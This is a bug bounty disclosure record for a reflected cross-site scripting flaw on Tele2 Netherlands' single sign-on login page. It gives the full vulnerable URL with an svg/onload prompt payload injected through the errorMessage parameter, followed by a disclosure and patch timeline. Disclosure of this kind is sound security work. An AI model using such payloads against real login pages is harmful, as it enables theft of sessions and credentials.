sso.tele2.nl XSS vulnerability

2017-01-06T15:37:00
ID OBB:203634
Type openbugbounty
Reporter Spam404
Modified 2017-07-04T23:44:00

Description

Vulnerable URL:

`https://sso.tele2.nl/is-authenticationendpoint/login.do?RelayState=%7BRetriedLogin%3Atrue%7D&SAMLRequest;=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%2B&commonAuthCallerPath;=%252Fsamlsso&forceAuth;=false&passiveAuth;=false&relyingParty;=MyTele2&tenantDomain;=consumer.tele2.nl&type;=samlsso&sessionDataKey;=3bec3fe7-1484-4e67-8192-1b09b1581574&relyingParty;=MyTele2&type;=samlsso&sp;=MyTele2&isSaaSApp;=false&authenticators;=BasicAuthenticator:LOCAL&errorMessage;=%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E`

Details:

Description| Value
---|---
Patched:| Yes, at 04.07.2017
Latest check for patch:| 04.07.2017 09:27 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check sso.tele2.nl SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 January, 2017 15:37 GMT
Generic security notifications sent to website owner| 6 January, 2017 15:40 GMT
Notification sent to subscribers (without technical details)| 6 January, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 31 March, 2017 16:16 GMT
Vulnerability patched by the website owner| 4 July, 2017 23:44 GMT